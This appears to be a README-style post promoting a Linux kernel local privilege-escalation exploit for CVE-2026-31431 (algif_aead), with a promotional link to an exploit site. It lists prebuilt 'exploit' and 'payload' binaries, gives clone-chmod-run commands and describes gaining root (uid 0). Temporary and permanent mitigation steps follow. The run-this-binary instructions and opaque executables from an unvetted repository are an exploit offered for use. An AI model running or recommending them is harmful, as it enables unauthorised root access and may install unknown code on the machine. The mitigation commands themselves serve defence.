Get all new CVE alert on https://exploitroom.com
mail :: ~/Desktop/CVE-2026 » file *
exploit: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=9454dbdde0ac2d1a8981c06db89f24a4753ec3b7, for GNU/Linux 3.2.0, not stripped
payload: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=9b0f16503767336bc8a821482933c1111aafa23a, stripped
verify_vulneurable: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=a79c6ab7e9d14e60af8d7dfc1c102e3bc93a910b, for GNU/Linux 3.2.0, not stripped
mail :: ~/Desktop/CVE-2026 »
git clone https://github.com/ExploitEoom/CVE-2026-31431.git
cd CVE-2026-31431
chmod +x *
./verify_vulneurable
./exploit
Screencast.From.2026-05-01.18-55-39.mp4
The id changed from 1000 to 0000
We cant operate some system commands
Go as root using sudo su or use ./exploit then search the user you run the exploit
Replace the 0000 to 1000
Here you have back your user
- Temporary mitigation – (check if algif_aead is in use) Run:
lsmod | grep algif_aead
No output (not in use) → run the disable commands below
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null || true
- Permanent fix (evaluate business compatibility carefully before execution)
Debian/Ubuntu: sudo apt update && sudo apt upgrade -y CentOS/RHEL/Rocky/Alma: sudo dnf update -y Patch: https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5